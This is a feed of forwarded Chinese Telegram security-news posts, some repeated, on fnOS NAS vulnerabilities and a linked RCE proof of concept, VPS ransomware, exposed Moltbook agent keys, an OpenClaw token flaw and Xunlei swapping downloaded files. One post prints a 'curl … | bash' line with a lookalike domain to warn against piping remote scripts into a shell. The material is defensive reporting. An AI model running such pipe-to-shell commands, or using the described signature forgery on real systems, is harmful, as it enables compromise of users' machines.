Forwarded from 每日消费电子观察 (无羽の翼 (「 • ̀ω•́ )「)
飞牛 fnOS 疑似有路径穿越漏洞,可未授权访问全部文件
https://www.v2ex.com/t/1189672
https://linux.do/t/topic/1547543
已知1.1.15版本已经修复该漏洞。
官方明知存在漏洞,却不进行公告、警告、或督促用户升级到最新版本
https://www.v2ex.com/t/1189672
https://linux.do/t/topic/1547543
V2EX
飞牛 OS 疑似 0day 漏洞,许多用户设备遭到攻击,请尽快检查设备或暂停使用 - V2EX
信息安全 - @izToDo - 起因:在近期使用飞牛时,发现会时不时的出现设备卡死、网络报错的情况,因为每天我都会通过飞牛去跑数据同步,所以没有关心这个问题,只以为是数据太多导致 FNOS 出现的什么莫名奇妙 Bug 。
Forwarded from 科技圈🎗在花频道📮
飞牛OS最新版1.1.15-1493仍存极其严重WebSocket漏洞
截至目前,飞牛OS新版1.1.15-1493中的WebSocket接口仍然存在命令注入漏洞。允许攻击者通过伪造 WebSocket 请求中的签名,执行恶意命令。该漏洞需要攻击者先登录并获取有效的认证凭证,但一旦成功认证,攻击者可利用漏洞注入系统命令,造成严重的安全风险。
该漏洞需有效账户登录,且可能伴随认证绕过问题,导致系统Mirror添加功能被滥用。
PS:此漏洞管理组判断为极其严重的authorization bypass 漏洞,经管理组在本地环境中测试已成功,并且由于飞牛OS用户群比较庞大,怀疑已有大量飞牛OS系统的版本已被当作肉机使用,建议所有使用飞牛OS用户暂时关闭一切公网访问和内网穿透,并及时断网排查隐患。
🍀在花频道 🍵茶馆聊天 📮投稿
截至目前,飞牛OS新版1.1.15-1493中的WebSocket接口仍然存在命令注入漏洞。允许攻击者通过伪造 WebSocket 请求中的签名,执行恶意命令。该漏洞需要攻击者先登录并获取有效的认证凭证,但一旦成功认证,攻击者可利用漏洞注入系统命令,造成严重的安全风险。
该漏洞需有效账户登录,且可能伴随认证绕过问题,导致系统Mirror添加功能被滥用。
PS:此漏洞管理组判断为极其严重的authorization bypass 漏洞,经管理组在本地环境中测试已成功,并且由于飞牛OS用户群比较庞大,怀疑已有大量飞牛OS系统的版本已被当作肉机使用,建议所有使用飞牛OS用户暂时关闭一切公网访问和内网穿透,并及时断网排查隐患。
🍀在花频道 🍵茶馆聊天 📮投稿
Forwarded from 蓝点网订阅频道
#安全资讯 紧急安全提醒!请立即备份自己 VPS 中的数据,大量 VPS 提供商面临如同 CloudCone 的勒索软件攻击。
据 LET 社区中的信息,此次攻击源头是 Virtualizor 管理面板中的漏洞,其他已经遭到攻击的 HostSlick 及 OuiHeberg,其他尚未有攻击消息但也使用 Virtualizor 的包括:
ColoCloud
Virtono
SolidSEOVPS
Naranjatech
LittleCreek
DediRock
Chunkserv
RareCloud
HostSlick 称自己大约有 25% 的服务器遭到攻击,黑客通常直接攻击小鸡来对小鸡使用者进行勒索,目前没有消息显示黑客直接攻击母鸡勒索 VPS 提供商。
查看全文:https://ourl.co/111682?t
参考信息源:VPS信号旗播报
🤪 订阅 😁 Twitter 👍 CN2VPS 👀 低延迟HK服务器
据 LET 社区中的信息,此次攻击源头是 Virtualizor 管理面板中的漏洞,其他已经遭到攻击的 HostSlick 及 OuiHeberg,其他尚未有攻击消息但也使用 Virtualizor 的包括:
ColoCloud
Virtono
SolidSEOVPS
Naranjatech
LittleCreek
DediRock
Chunkserv
RareCloud
HostSlick 称自己大约有 25% 的服务器遭到攻击,黑客通常直接攻击小鸡来对小鸡使用者进行勒索,目前没有消息显示黑客直接攻击母鸡勒索 VPS 提供商。
查看全文:https://ourl.co/111682?t
参考信息源:VPS信号旗播报
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 科技圈🎗在花频道📮
Moltbook 数据库配置失误:任何人可接管站内 AI 账号发帖
404 Media 报道称,AI 代理“社交媒体”网站 Moltbook 因后端配置失误,公开数据库暴露了站内所有 AI 代理的可用密钥信息,外部任意人都可能接管任意代理账号并发帖。
安全研究员 Jameson O'Reilly 指出,Moltbook 使用 Supabase 且疑似未开启或未配置行级安全(RLS),网站代码里还暴露了 Supabase URL 和 publishable key;在缺少 RLS/权限策略保护的情况下,使得代理的 secret API key、claim token、验证码和归属关系等可被访问。404 Media 已验证可在获授权情况下改写账号信息;创建者未回应置评,但漏洞已被关闭,并联系 O'Reilly 协助加固。
404 Media
🍀在花频道 🍵茶馆聊天 📮投稿
404 Media 报道称,AI 代理“社交媒体”网站 Moltbook 因后端配置失误,公开数据库暴露了站内所有 AI 代理的可用密钥信息,外部任意人都可能接管任意代理账号并发帖。
安全研究员 Jameson O'Reilly 指出,Moltbook 使用 Supabase 且疑似未开启或未配置行级安全(RLS),网站代码里还暴露了 Supabase URL 和 publishable key;在缺少 RLS/权限策略保护的情况下,使得代理的 secret API key、claim token、验证码和归属关系等可被访问。404 Media 已验证可在获授权情况下改写账号信息;创建者未回应置评,但漏洞已被关闭,并联系 O'Reilly 协助加固。
404 Media
🍀在花频道 🍵茶馆聊天 📮投稿
Forwarded from [Patience Forever]
PoC:飞牛OS(fnOS)RCE链:认证绕过
无需longtoken,拿到rsa_private_key.pem就可以任意伪造签名
https://github.com/bron1e/fnos-rce-chain
无需longtoken,拿到rsa_private_key.pem就可以任意伪造签名
https://github.com/bron1e/fnos-rce-chain
GitHub
GitHub - bron1e/fnos-rce-chain: 飞牛系统(fnOS)远程代码执行链:认证绕过
飞牛系统(fnOS)远程代码执行链:认证绕过. Contribute to bron1e/fnos-rce-chain development by creating an account on GitHub.
👍1
Forwarded from 蓝点网订阅频道
#人工智能 热门 AI 工具 OpenClaw 出现高危安全漏洞,请立即升级到 v2026.1.29 + 版,若使用 v2026.1.28 及以下版本均可能被攻击。
黑客借助该漏洞诱导用户访问钓鱼网站即可获得令牌从而控制整个 OpenClaw 实例,因此用户赋予 OpenClaw 的权限越多,潜在泄露的数据也会越多。
查看全文:https://ourl.co/111689?t
🤪 订阅 😁 Twitter 👍 CN2VPS
黑客借助该漏洞诱导用户访问钓鱼网站即可获得令牌从而控制整个 OpenClaw 实例,因此用户赋予 OpenClaw 的权限越多,潜在泄露的数据也会越多。
查看全文:https://ourl.co/111689?t
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Forwarded from codedump的电报频道 (老C)
#开源项目
#Rust
tirith
仅凭肉眼,根本看不出下面两个curl命令的区别:
#Rust
tirith
仅凭肉眼,根本看不出下面两个curl命令的区别:
curl -sSL https://install.example-cli.dev | bash # safe
curl -sSL https://іnstall.example-clі.dev | bash # compromised
感觉随便下载执行脚本才是更大的安全问题
每次看到curl xxx | bash就手动改成curl xxx -O x.sh然后看一眼就好了,实在懒得看也可以丢给AI
每次看到curl xxx | bash就手动改成curl xxx -O x.sh然后看一眼就好了,实在懒得看也可以丢给AI
👍4
Forwarded from 蓝点网订阅频道
#软件资讯 迅雷被发现替换用户下载的 ISO 镜像,换成带有各种捆绑软件 (包括 360 浏览器、双核浏览器、Win 应用商店、WPS、夸克等等) 的第三方封装版。
而且迅雷只检测文件名来替换,即便源下载地址压根不存在也会继续下载,所以这与所谓的替换源加速也没有任何关系,并且没人知道迅雷到底劫持替换多少文件。
查看全文:https://ourl.co/111762?t
🤪 订阅 😁 Twitter 👍 OpenClaw部署指南
而且迅雷只检测文件名来替换,即便源下载地址压根不存在也会继续下载,所以这与所谓的替换源加速也没有任何关系,并且没人知道迅雷到底劫持替换多少文件。
查看全文:https://ourl.co/111762?t
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 科技圈🎗在花频道📮
Anthropic 于 2 月 5 日发布大型 AI 模型最新版本 Claude Opus 4.6,在无特定指令测试环境下,自主发现了开源代码库中超过 500 个此前未知的零日(Zero-day)高危漏洞。
测试显示,该模型利用高级推理能力,在传统模糊测试(Fuzzing)失效的情况下,成功识别出 GhostScript、OpenSC 及 CGIF 等工具的安全缺陷。目前所有漏洞均已通过人工验证。Anthropic 已针对该模型实施安全管控以防滥用,并计划向网络安全社区推广此类自动化漏洞检测能力。
Axios
🍀在花频道 🍵茶馆聊天 📮投稿
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 蓝点网订阅频道
#快讯 快手因平台出现大量低俗色情内容直播问题,被监管部门罚款 1.191 亿元。
针对近期快手平台出现大量色情低俗内容直播问题,在国家互联网信息办公室指导下,北京市互联网信息办公室依法对北京快手科技有限公司涉嫌违法行为进行立案调查。经查实,快手平台未履行网络安全保护义务,未及时处置系统漏洞等安全风险,未对用户发布的违法信息立即采取停止传输、消除等处置措施,情节严重,影响恶劣。
2月6日,北京市互联网信息办公室依据《中华人民共和国网络安全法》《中华人民共和国行政处罚法》等法律法规,对北京快手科技有限公司处警告、1.191亿元人民币罚款处罚,同时责令其限期改正、依法依约处置账号、从严处理责任人。
🤪 订阅 😁 Twitter 👍 OpenClaw机器人部署指南
针对近期快手平台出现大量色情低俗内容直播问题,在国家互联网信息办公室指导下,北京市互联网信息办公室依法对北京快手科技有限公司涉嫌违法行为进行立案调查。经查实,快手平台未履行网络安全保护义务,未及时处置系统漏洞等安全风险,未对用户发布的违法信息立即采取停止传输、消除等处置措施,情节严重,影响恶劣。
2月6日,北京市互联网信息办公室依据《中华人民共和国网络安全法》《中华人民共和国行政处罚法》等法律法规,对北京快手科技有限公司处警告、1.191亿元人民币罚款处罚,同时责令其限期改正、依法依约处置账号、从严处理责任人。
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔1